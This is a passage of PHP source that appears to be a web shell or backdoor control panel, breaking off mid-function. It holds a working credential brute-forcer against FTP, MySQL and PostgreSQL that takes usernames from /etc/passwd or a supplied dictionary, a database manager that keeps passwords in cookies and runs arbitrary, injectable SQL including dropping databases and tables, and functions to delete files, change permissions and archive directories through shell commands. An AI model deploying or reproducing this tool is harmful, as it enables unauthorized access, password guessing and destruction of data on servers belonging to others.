5553 echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
5554 if( $_GET['prototype'] == 'ftp' )
5555 {
5556 function BruteFun($ip,$port,$login,$pass)
5557 {
5558 $fp = @ftp_connect($ip, $port?$port:21);
5559 if(!$fp) return false;
5560 $res = @ftp_login($fp, $login, $pass);
5561 @ftp_close($fp);
5562 return $res;
5563 }
5564 }
5565 elseif( $_GET['prototype'] == 'mysql' )
5566 {
5567 function BruteFun($ip,$port,$login,$pass)
5568 {
5569 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
5570 @mysql_close($res);
5571 return $res;
5572 }
5573 }
5574 elseif( $_GET['prototype'] == 'pgsql' )
5575 {
5576 function BruteFun($ip,$port,$login,$pass)
5577 {
5578 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
5579 $res = @pg_connect($str);
5580 @pg_close($res);
5581 return $res;
5582 }
5583 }
5584
5585 $success = 0;
5586 $attempts = 0;
5587 $server = explode(":", $_GET['server']);
5588
5589 if($_GET['type'] == 1)
5590 {
5591 $temp = @file('/etc/passwd');
5592 if( is_array($temp))
5593 foreach($temp as $line)
5594 {
5595 $line = explode(":", $line);
5596 ++$attempts;
5597 if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
5598 {
5599 $success++;
5600 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
5601 }
5602 if(@$_GET['reverse'])
5603 {
5604 $tmp = "";
5605 for($i=strlen($line[0])-1; $i>=0; --$i)
5606 $tmp .= $line[0][$i];
5607 ++$attempts;
5608 if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
5609 {
5610 $success++;
5611 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
5612 }
5613 }
5614 }
5615 }
5616 elseif($_GET['type'] == 2)
5617 {
5618 $temp = @file($_GET['dict']);
5619 if( is_array($temp) )
5620 foreach($temp as $line)
5621 {
5622 $line = trim($line);
5623 ++$attempts;
5624 if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
5625 {
5626 $success++;
5627 echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
5628 }
5629 }
5630 }
5631 echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
5632}
5633// Execute Query
5634else if(isset($_GET["executeit"]))
5635{
5636 if(isset($_GET['username']) && isset($_GET['server']))
5637 {
5638 $dbserver = $_GET['server'];
5639 $dbuser = $_GET['username'];
5640 $dbpass = $_GET['password'];
5641 if(mysql_connect($dbserver,$dbuser,$dbpass))
5642 {
5643 setcookie("dbserver", $dbserver);
5644 setcookie("dbuser", $dbuser);
5645 setcookie("dbpass", $dbpass);
5646
5647 listdatabase();
5648 }
5649 else
5650 echo "cannotconnect";
5651 }
5652}
5653else if(isset($_GET['action']) && isset($_GET['dbname']))
5654
5655
5656 {
5657 if($_GET['action'] == "createDB")
5658 {
5659 $dbname = $_GET['dbname'];
5660 $dbserver = $_COOKIE["dbserver"];
5661 $dbuser = $_COOKIE["dbuser"];
5662 $dbpass = $_COOKIE["dbpass"];
5663 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
5664 mysql_query("create database $dbname",$mysqlHandle);
5665 listdatabase();
5666 }
5667 if($_GET['action'] == 'dropDB')
5668 {
5669 $dbname = $_GET['dbname'];
5670 $dbserver = $_COOKIE["dbserver"];
5671 $dbuser = $_COOKIE["dbuser"];
5672 $dbpass = $_COOKIE["dbpass"];
5673 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
5674 mysql_query("drop database $dbname",$mysqlHandle);
5675 mysql_close($mysqlHandle);
5676 listdatabase();
5677 }
5678
5679 if($_GET['action'] == 'listTables')
5680 {
5681 listtable();
5682 }
5683
5684 // Create Tables
5685 if($_GET['action'] == "createtable")
5686 {
5687 $dbserver = $_COOKIE["dbserver"];
5688 $dbuser = $_COOKIE["dbuser"];
5689 $dbpass = $_COOKIE["dbpass"];
5690 $dbname = $_GET['dbname'];
5691 $tablename = $_GET['tablename'];
5692 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5693 mysql_select_db($dbname);
5694 mysql_query("CREATE TABLE $tablename ( no INT )");
5695 listtable();
5696 }
5697
5698 // Drop Tables
5699 if($_GET['action'] == "dropTable")
5700 {
5701 $dbserver = $_COOKIE["dbserver"];
5702 $dbuser = $_COOKIE["dbuser"];
5703 $dbpass = $_COOKIE["dbpass"];
5704 $dbname = $_GET['dbname'];
5705 $tablename = $_GET['tablename'];
5706 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5707 mysql_select_db($dbname);
5708 mysql_query("drop table $tablename");
5709 listtable();
5710 }
5711
5712 // Empty Tables
5713 if($_GET['action'] == "empty")
5714 {
5715 $dbserver = $_COOKIE["dbserver"];
5716 $dbuser = $_COOKIE["dbuser"];
5717 $dbpass = $_COOKIE["dbpass"];
5718 $dbname = $_GET['dbname'];
5719 $tablename = $_GET['tablename'];
5720 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5721 mysql_select_db($dbname);
5722 mysql_query("delete from $tablename");
5723 listtable();
5724 }
5725
5726 // Empty Tables
5727 if($_GET['action'] == "dropField")
5728 {
5729 $dbserver = $_COOKIE["dbserver"];
5730 $dbuser = $_COOKIE["dbuser"];
5731 $dbpass = $_COOKIE["dbpass"];
5732 $dbname = $_GET['dbname'];
5733 $tablename = $_GET['tablename'];
5734 $fieldname = $_GET['fieldname'];
5735 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5736 mysql_select_db($dbname);
5737 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
5738 mysql_select_db( $dbname, $mysqlHandle );
5739 mysql_query( $queryStr , $mysqlHandle );
5740 listtable();
5741 }
5742
5743 if($_GET['action'] == 'viewdb')
5744 {
5745 listdatabase();
5746 }
5747
5748 // View Table Schema
5749 if($_GET['action'] == "viewSchema")
5750 {
5751 $dbserver = $_COOKIE["dbserver"];
5752 $dbuser = $_COOKIE["dbuser"];
5753 $dbpass = $_COOKIE["dbpass"];
5754 $dbname = $_GET['dbname'];
5755 $tablename = $_GET['tablename'];
5756 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5757 mysql_select_db($dbname);
5758 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5759 $pResult = mysql_query( "SHOW fields FROM $tablename" );
5760 $num = mysql_num_rows( $pResult );
5761 echo "<br><br><table class=btmtbl align=center cellspacing=4 style='width:80%;' border=1>";
5762 echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
5763 for( $i = 0; $i < $num; $i++ )
5764 {
5765 $field = mysql_fetch_array( $pResult );
5766 echo "<tr>\n";
5767 echo "<td>".$field["Field"]."</td>\n";
5768 echo "<td>".$field["Type"]."</td>\n";
5769 echo "<td>".$field["Null"]."</td>\n";
5770 echo "<td>".$field["Key"]."</td>\n";
5771 echo "<td>".$field["Default"]."</td>\n";
5772 echo "<td>".$field["Extra"]."</td>\n";
5773 $fieldname = $field["Field"];
5774 echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
5775 echo "</tr>\n";
5776 }
5777 echo "</table>";
5778 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5779 }
5780
5781 // Execute Query
5782 if($_GET['action'] == "executequery")
5783 {
5784 $dbserver = $_COOKIE["dbserver"];
5785 $dbuser = $_COOKIE["dbuser"];
5786 $dbpass = $_COOKIE["dbpass"];
5787 $dbname = $_GET['dbname'];
5788 $tablename = $_GET['tablename'];
5789 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5790 mysql_select_db($dbname);
5791 $result = mysql_query($_GET['executemyquery']);
5792
5793 // results
5794 echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
5795
5796 $count = 0;
5797 while ($row = mysql_fetch_assoc($result))
5798 {
5799 echo "<tr>\r\n";
5800
5801 if ($count==0) // list column names
5802 {
5803 echo "<tr>\r\n";
5804 while($key = key($row))
5805 {
5806 echo "<td><b>" . $key . "</b></td>\r\n";
5807 next($row);
5808 }
5809 echo "</tr>\r\n";
5810 }
5811
5812 foreach($row as $r) // list content of column names
5813 {
5814 if ($r=='') $r = '<font >NULL</font>';
5815 echo "<td><font class=txt>" . $r . "</font></td>\r\n";
5816 }
5817 echo "</tr>\r\n";
5818 $count++;
5819 }
5820 echo "</table>\n\r<font class=txt size=3>" . $count . " rows returned.</font>\r\n</html>";
5821 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5822 }
5823
5824 // View Table Data
5825 if($_GET['action'] == "viewdata")
5826 {
5827 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
5828 $dbserver = $_COOKIE["dbserver"];
5829 $dbuser = $_COOKIE["dbuser"];
5830 $dbpass = $_COOKIE["dbpass"];
5831 $dbname = $_GET['dbname'];
5832 $tablename = $_GET['tablename'];
5833 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5834 ?>
5835 <br><br>
5836 <form>
5837 <table>
5838 <tr>
5839 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
5840 </tr>
5841 <tr>
5842 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
5843 </tr>
5844 </table>
5845 </form>
5846 <?php
5847 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5848 mysql_select_db($dbname);
5849
5850 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
5851 $row = mysql_fetch_array($sql);
5852 $rowid = $row['COLUMN_NAME'];
5853
5854 echo "<br><font size=4>Data in Table</font><br>";
5855 if( $tablename != "" )
5856 echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
5857 else
5858 echo "<font size=3 class=txt>$dbname</font><br>";
5859
5860 $queryStr = "";
5861 $pag = 0;
5862 $queryStr = stripslashes( $queryStr );
5863 if( $queryStr == "" )
5864 {
5865 if(isset($_REQUEST['page']))
5866 {
5867 $res = mysql_query("select * from $tablename");
5868 $getres = mysql_num_rows($res);
5869 $coun = ceil($getres/30);
5870 if($_REQUEST['page'] != 1)
5871
5872 $pag = $_REQUEST['page'] * 30;
5873 else
5874 $pag = $_REQUEST['page'] * 30;
5875
5876 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
5877 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
5878 $arrcount = 1;
5879 $arrdata[$arrcount] = 0;
5880 while($row = mysql_fetch_array($sql))
5881 {
5882 $arrdata[$arrcount] = $row[$rowid];
5883 $arrcount++;
5884 }
5885 }
5886 else
5887 {
5888 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
5889 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
5890 $arrcount = 1;
5891 $arrdata[$arrcount] = 0;
5892 while($row = mysql_fetch_array($sql))
5893 {
5894 $arrdata[$arrcount] = $row[$rowid];
5895 $arrcount++;
5896 }
5897 }
5898 if( $orderby != "" )
5899 $queryStr .= " ORDER BY $orderby";
5900 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
5901 }
5902
5903
5904 $pResult = mysql_query($queryStr );
5905 $fieldt = mysql_fetch_field($pResult);
5906 $tablename = $fieldt->table;
5907 $errMsg = mysql_error();
5908
5909 $GLOBALS[queryStr] = $queryStr;
5910
5911 if( $pResult == false )
5912 {
5913 echoQueryResult();
5914 return;
5915 }
5916 if( $pResult == 1 )
5917 {
5918 $errMsg = "Success";
5919 echoQueryResult();
5920 return;
5921 }
5922
5923 echo "<hr color='#1B1B1B'>\n";
5924
5925 $row = mysql_num_rows( $pResult );
5926 $col = mysql_num_fields( $pResult );
5927
5928 if( $row == 0 )
5929 {
5930 echo "<font size=3>No Data Exist!</font>";
5931 return;
5932 }
5933
5934 if( $rowperpage == "" ) $rowperpage = 30;
5935 if( $page == "" ) $page = 0;
5936 else $page--;
5937 mysql_data_seek( $pResult, $page * $rowperpage );
5938
5939 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 align=center>\n";
5940 echo "<tr>\n";
5941 for( $i = 0; $i < $col; $i++ )
5942 {
5943 $field = mysql_fetch_field( $pResult, $i );
5944 echo "<th>";
5945 if($action == "viewdata")
5946 echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
5947 else
5948 echo $field->name."\n";
5949 echo "</th>\n";
5950 }
5951 echo "<th colspan=2>Action</th>\n";
5952 echo "</tr>\n";
5953 $num=1;
5954
5955
5956 $acount = 1;
5957
5958 for( $i = 0; $i < $rowperpage; $i++ )
5959 {
5960 $rowArray = mysql_fetch_row( $pResult );
5961 if( $rowArray == false ) break;
5962 echo "<tr>\n";
5963 $key = "";
5964 for( $j = 0; $j < $col; $j++ )
5965 {
5966 $data = $rowArray[$j];
5967
5968 $field = mysql_fetch_field( $pResult, $j );
5969 if( $field->primary_key == 1 )
5970 $key .= "&" . $field->name . "=" . $data;
5971
5972 if( strlen( $data ) > 30 )
5973 $data = substr( $data, 0, 30 ) . "...";
5974 $data = htmlspecialchars( $data );
5975 echo "<td>\n";
5976 echo "<font class=txt>$data</font>\n";
5977 echo "</td>\n";
5978 }
5979
5980 if(!is_numeric($arrdata[$acount]))
5981 echo "<td colspan=2>No Key</td>\n";
5982 else
5983 {
5984 echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>\n";
5985 echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>\n";
5986 $acount++;
5987 }
5988 }
5989 echo "</tr>\n";
5990
5991
5992 echo "</table>";
5993 if($arrcount > 30)
5994 {
5995 $res = mysql_query("select * from $tablename");
5996 $getres = mysql_num_rows($res);
5997 $coun = ceil($getres/30);
5998 echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
5999 for($i=0;$i<$coun;$i++)
6000 echo "<option value=$i>$i</option>";
6001
6002 echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
6003 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6004 }
6005 }
6006
6007 // Delete Table Data
6008 if($_GET['action'] == "deleteData")
6009 {
6010 $dbserver = $_COOKIE["dbserver"];
6011 $dbuser = $_COOKIE["dbuser"];
6012 $dbpass = $_COOKIE["dbpass"];
6013 $dbname = $_GET['dbname'];
6014 $tablename = $_GET['tablename'];
6015 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6016 mysql_select_db($dbname);
6017 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6018 $row = mysql_fetch_array($sql);
6019 $row = $row['COLUMN_NAME'];
6020 $rowid = $_GET[$row];
6021 mysql_query("delete from $tablename where $row = '$rowid'");
6022 listtable();
6023 }
6024 // Edit Table Data
6025 if($_GET['action'] == "editData")
6026 {
6027 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
6028 $dbserver = $_COOKIE["dbserver"];
6029 $dbuser = $_COOKIE["dbuser"];
6030 $dbpass = $_COOKIE["dbpass"];
6031 $dbname = $_GET['dbname'];
6032 $tablename = $_GET['tablename'];
6033 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6034 ?>
6035 <br><br>
6036 <form action="<?php echo $self; ?>" method="post">
6037 <?php
6038 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6039 mysql_select_db($dbname);
6040
6041 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6042 $row = mysql_fetch_array($sql);
6043 $row = $row['COLUMN_NAME'];
6044 $rowid = $_GET[$row];
6045
6046 $pResult = mysql_list_fields( $dbname, $tablename );
6047 $num = mysql_num_fields( $pResult );
6048
6049 $key = "";
6050 for( $i = 0; $i < $num; $i++ )
6051 {
6052 $field = mysql_fetch_field( $pResult, $i );
6053 if( $field->primary_key == 1 )
6054 if( $field->numeric == 1 )
6055 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
6056 else
6057 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
6058 }
6059 $key = substr( $key, 0, strlen($key)-4 );
6060
6061 mysql_select_db( $dbname, $mysqlHandle );
6062 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
6063 $data = mysql_fetch_array( $pResult );
6064
6065 echo "<table class=btmtbl cellspacing=1 cellpadding=2 border=1>\n";
6066 echo "<tr>\n";
6067 echo "<th>Name</th>\n";
6068 echo "<th>Type</th>\n";
6069 echo "<th>Function</th>\n";
6070 echo "<th>Data</th>\n";
6071 echo "</tr>\n";
6072
6073 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6074 $num = mysql_num_rows( $pResult );
6075
6076 $pResultLen = mysql_list_fields( $dbname, $tablename );
6077 $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
6078 $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
6079 for( $i = 0; $i < $num; $i++ )
6080 {
6081 $field = mysql_fetch_array( $pResult );
6082 $fieldname = $field["Field"];
6083 $fieldtype = $field["Type"];
6084 $len = mysql_field_len( $pResultLen, $i );
6085
6086 echo "<tr>";
6087 echo "<td>$fieldname</td>";
6088 echo "<td>".$field["Type"]."</td>";
6089 echo "<td>\n";
6090 echo "<select name=${fieldname}_function class=sbox>\n";
6091 echo "<option>\n";
6092 echo "<option>ASCII\n";
6093 echo "<option>CHAR\n";
6094 echo "<option>SOUNDEX\n";
6095 echo "<option>CURDATE\n";
6096 echo "<option>CURTIME\n";
6097 echo "<option>FROM_DAYS\n";
6098 echo "<option>FROM_UNIXTIME\n";
6099 echo "<option>NOW\n";
6100 echo "<option>PASSWORD\n";
6101 echo "<option>PERIOD_ADD\n";
6102 echo "<option>PERIOD_DIFF\n";
6103 echo "<option>TO_DAYS\n";
6104 echo "<option>USER\n";
6105 echo "<option>WEEKDAY\n";
6106 echo "<option>RAND\n";
6107 echo "</select>\n";
6108 echo "</td>\n";
6109 $value = htmlspecialchars($data[$i]);
6110 $type = strtok( $fieldtype, " (,)\n" );
6111 if( $type == "enum" || $type == "set" )
6112 {
6113 echo "<td>\n";
6114 if( $type == "enum" )
6115 echo "<select name=$fieldname class=box>\n";
6116 else if( $type == "set" )
6117 echo "<select name=$fieldname size=4 class=box multiple>\n";
6118 while( $str = strtok( "'" ) )
6119 {
6120 if( $value == $str )
6121 echo "<option selected>$str\n";
6122 else
6123 echo "<option>$str\n";
6124 strtok( "'" );
6125 }
6126 echo "</select>\n";
6127 echo "</td>\n";
6128 }
6129 else
6130 {
6131 if( $len < 40 )
6132 echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$value\" class=box></td>\n";
6133 else
6134 echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n";
6135 }
6136 $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
6137 $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
6138 echo "</tr>";
6139 }
6140 $fundata1=eregi_replace(',$', '', $fundata1);
6141 $fundata2=eregi_replace(',$', '', $fundata2);
6142
6143 echo "</table><p>\n";
6144 echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>\n";
6145 echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>\n";
6146 echo "</form>\n";
6147 }
6148 }
6149// Edit Submit Table Data
6150else if($_REQUEST['action'] == "editsubmitData")
6151{
6152 $dbserver = $_COOKIE["dbserver"];
6153 $dbuser = $_COOKIE["dbuser"];
6154 $dbpass = $_COOKIE["dbpass"];
6155 $dbname = $_POST['dbname'];
6156 $tablename = $_POST['tablename'];
6157
6158 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6159 mysql_select_db($dbname);
6160
6161 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6162 $row = mysql_fetch_array($sql);
6163 $row = $row['COLUMN_NAME'];
6164 $rowid = $_POST[$row];
6165
6166 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6167 $num = mysql_num_rows( $pResult );
6168
6169 $rowcount = $num;
6170
6171 $pResultLen = mysql_list_fields( $dbname, $tablename );
6172
6173 for( $i = 0; $i < $num; $i++ )
6174 {
6175 $field = mysql_fetch_array( $pResult );
6176 $fieldname = $field["Field"];
6177 $arrdata = $_REQUEST[$fieldname];
6178
6179 $str .= " " . $fieldname . " = '" . $arrdata . "'";
6180 $rowcount--;
6181 if($rowcount != 0)
6182 $str .= ",";
6183 }
6184
6185 $str = "update $tablename set" . $str . " where $row=$rowid";
6186 mysql_query($str);
6187 ?><div id="showsql"></div><?php
6188}
6189// Insert Table Data
6190else if($_REQUEST['action'] == "insertdata")
6191{
6192 $dbserver = $_COOKIE["dbserver"];
6193 $dbuser = $_COOKIE["dbuser"];
6194 $dbpass = $_COOKIE["dbpass"];
6195 $dbname = $_POST['dbname'];
6196 $tablename = $_POST['tablename'];
6197
6198 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6199 mysql_select_db($dbname);
6200
6201 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6202 $row = mysql_fetch_array($sql);
6203 $row = $row['COLUMN_NAME'];
6204 $rowid = $_POST[$row];
6205
6206 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6207 $num = mysql_num_rows( $pResult );
6208
6209 $rowcount = $num;
6210
6211 $pResultLen = mysql_list_fields( $dbname, $tablename );
6212
6213 for( $i = 0; $i < $num; $i++ )
6214 {
6215 $field = mysql_fetch_array( $pResult );
6216 $fieldname = $field["Field"];
6217 $arrdata = $_REQUEST[$fieldname];
6218
6219 $str1 .= "".$fieldname . ",";
6220 $str2 .= "'".$arrdata . "',";
6221 $rowcount--;
6222 if($rowcount != 0)
6223 {
6224 //$str1 .= $fieldname . ",";
6225 //$str2 .= $arrdata . ",";
6226 }
6227 }
6228 $str1=eregi_replace(',$', '', $str1);
6229 $str2=eregi_replace(',$', '', $str2);
6230 $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
6231 mysql_query($str);
6232
6233 ?><div id="showsql"></div><?php
6234}
6235else if(isset($_GET['logoutdb']))
6236{
6237 setcookie("dbserver",time() - 60*60);
6238 setcookie("dbuser",time() - 60*60);
6239 setcookie("dbpass",time() - 60*60);
6240 header("Location:$self");
6241}
6242else if(isset($_POST['choice']))
6243{
6244 if($_POST['choice'] == "delete")
6245 {
6246 $actbox = $_POST["actbox"];
6247 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6248
6249 foreach ($actbox as $myv)
6250 $myv = explode(",",$myv);
6251 foreach ($myv as $v)
6252 {
6253 if(is_file($v))
6254 {
6255 if(unlink($v))
6256 echo "<br><center><font class=txt>File $v Deleted Successfully</font></center>";
6257 else
6258 echo "<br><center>Cannot Delete File $v</center>";
6259 }
6260 else if(is_dir($v))
6261 {
6262 rrmdir($v);
6263 }
6264 }
6265 echo '<br>';
6266 }
6267 else if($_POST['choice'] == "chmod")
6268 { ?>
6269 <BR><form id="chform"><?php
6270 $actbox1 = $_POST['actbox'];
6271 foreach ($actbox1 as $myv)
6272 $myv = explode(",",$myv);
6273 foreach ($myv as $v)
6274 { ?>
6275 <input type="hidden" name="actbox3[]" id="actbox3[]" value="<?php echo $v; ?>">
6276 <?php }
6277 ?>
6278 <table align="center" border="3" style="width:40%; border-color:#333333;">
6279 <tr>
6280 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
6281 </tr>
6282 <tr>
6283 <td colspan="2" align="center" style="height:60px">
6284 <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" />
6285 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" /></form></center>
6286 </td>
6287 </tr>
6288 </table>
6289
6290 </form> <?php
6291 }
6292 else if($_POST['choice'] == "changefileperms")
6293 {
6294 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6295 if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
6296 {
6297 $actbox = $_POST["actbox"];
6298 foreach ($actbox as $myv)
6299 $myv = explode(",",$myv);
6300 foreach ($myv as $v)
6301 {
6302 if(is_file($v) || is_dir($v))
6303 {
6304 $perms = 0;
6305 for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
6306 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
6307 echo "<div align=left style=width:80%;>";
6308 if(@chmod($v,$perms))
6309 echo "<font class=txt>File $v Permissions Changed Successfully</font><br>";
6310 else
6311 echo "Cannot Change $v File Permissions<br>";
6312 echo "</div>";
6313 }
6314 }
6315
6316 }
6317 }
6318 else if($_POST['choice'] == "compre")
6319 {
6320 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6321 $actbox = $_POST["actbox"];
6322 foreach ($actbox as $myv)
6323 $myv = explode(",",$myv);
6324 foreach ($myv as $v)
6325 {
6326 if(is_file($v))
6327 {
6328 $zip = new ZipArchive();
6329 $filename= basename($v) . '.zip';
6330 if(($zip->open($filename, ZipArchive::CREATE))!==true)
6331 { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
6332 else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
6333 $zip->addFile(basename($v));
6334 $zip->close();
6335 }
6336 else if(is_dir($v))
6337 {
6338 if($os == "Linux")
6339 {
6340 $filename= basename($v);
6341 execmd("tar --create --recursion --file=$filename.tar $v");
6342 echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
6343 }
6344 else
6345 echo "<BR>Cannot compress directory<BR><BR>";
6346 }
6347 }
6348 echo '<BR><BR>';
6349 }
6350 else if($_POST['choice'] == "uncompre")
6351 {
6352 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6353 $actbox = $_POST["actbox"];
6354 foreach ($actbox as $myv)
6355 $myv = explode(",",$myv);
6356 foreach ($myv as $v)
6357 {
6358 if(is_file($v) || is_dir($v))
6359 {
6360 $zip = new ZipArchive;
6361 $filename= basename($v);
6362 $res = $zip->open($filename);
6363 if ($res === TRUE)
6364 {
